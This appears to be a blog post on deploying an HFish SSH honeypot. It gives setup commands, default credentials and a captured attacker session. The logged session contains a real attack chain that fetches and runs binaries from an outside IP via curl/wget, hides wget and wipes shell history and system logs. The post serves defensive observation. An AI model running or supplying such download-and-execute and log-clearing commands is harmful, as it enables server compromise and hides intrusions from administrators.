Every time a new server is opened, it will be subjected to SSH brute force attacks from weak passwords from Jiangsu Lianyungang and other overseas IP addresses. I am very curious about what actions these people will take after successfully logging into my server, so I set up an hfish honeypot to receive their attacks!
Setup Tutorial:#
Official deployment tutorial: https://hfish.net/#/2-2-linux
CentOS is the main development and testing system for the HFish team, and it is recommended to use CentOS to deploy the management end
If the deployment environment is Linux and can access the Internet, it is strongly recommended to use a one-click deployment script for installation and configuration. Before using the one-click script, please configure the firewall.
If the honeypot node is exposed to the Internet, there may be a limit of 1024 maximum TCP connections, which may cause other connections to be rejected. You can manually increase the maximum TCP connections on the machine. Refer to the solution link: https://www.cnblogs.com/lemon-flm/p/7975812.html
Run the following commands as root to configure the firewall to open TCP/4433 and TCP/4434
firewall-cmd --add-port=4433/tcp --permanent # (Used for web interface startup)
firewall-cmd --add-port=4434/tcp --permanent # (Used for communication between nodes and management ends)
firewall-cmd --reload
If the honeypot service needs to occupy other ports in the future, the same command can be used to open them.
Run the following one-click deployment command as root
bash <(curl -sS -L https://hfish.net/webinstall.sh)
After the installation is complete, log in using the following URL, account, and password
Login link: https://[ip]:4433/web/
Username: admin
Password: HFish2021
My Honeypot:#
I am using a high-interaction SSH honeypot here, which is different from a regular SSH honeypot in that it has more interactive functions and executes more commands. And any password can log in successfully.
Among them, I captured an SSH command execution from an overseas IP, but I haven't captured any others successfully yet!
New connection: 167.88.165.28:35180 (*****:22) [session: a58f59899b0d]
Remote SSH version: SSH-2.0-PUTTY
login attempt [root/123456a] succeeded
wdir="/bin"; for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"; do; if [ -w $i ]; then; wdir=$i; break; fi; done; cd $wdir; curl http://169.239.130.34/1.txt -o ygljglkjgfg0; chmod +x ygljglkjgfg0; ./ygljglkjgfg0; wget http://169.239.130.34/1.txt -O ygljglkjgfg1; chmod +x ygljglkjgfg1; ./ygljglkjgfg1; good http://169.239.130.34/1.txt -O ygljglkjgfg2; chmod +x ygljglkjgfg2; ./ygljglkjgfg2; sleep 2; wget http://169.239.130.34/2.txt -O sdf3fslsdf13; chmod +x sdf3fslsdf13; ./sdf3fslsdf13; good http://169.239.130.34/2.txt -O sdf3fslsdf14; chmod +x sdf3fslsdf14; ./sdf3fslsdf14; curl http://169.239.130.34/2.txt -o sdf3fslsdf15; chmod +x sdf3fslsdf15; ./sdf3fslsdf15; sleep 2; mv /usr/bin/wget /usr/bin/good; mv /bin/wget /bin/good; cat /dev/null >/root/.bash_history; cat /dev/null > /var/log/wtmp; cat /dev/null > /var/log/btmp; cat /dev/null > /var/log/lastlog; cat /dev/null > /var/log/secure; cat /dev/null > /var/log/boot.log; cat /dev/null > /var/log/cron; cat /dev/null > /var/log/dmesg; cat /dev/null > /var/log/firewalld; cat /dev/null > /var/log/maillog; cat /dev/null > /var/log/messages; cat /dev/null > /var/log/spooler; cat /dev/null > /var/log/syslog; cat /dev/null > /var/log/tallylog; cat /dev/null > /var/log/yum.log; cat /dev/null >/root/.bash_history; ls -la /etc/daemon.cfg; exit $?; ; ;
ls -la /etc/daemon.cfg
Connection lost after 10 seconds
I really don't understand why this idiot added an SSH key for me and changed my root password. I will continue to monitor for further actions!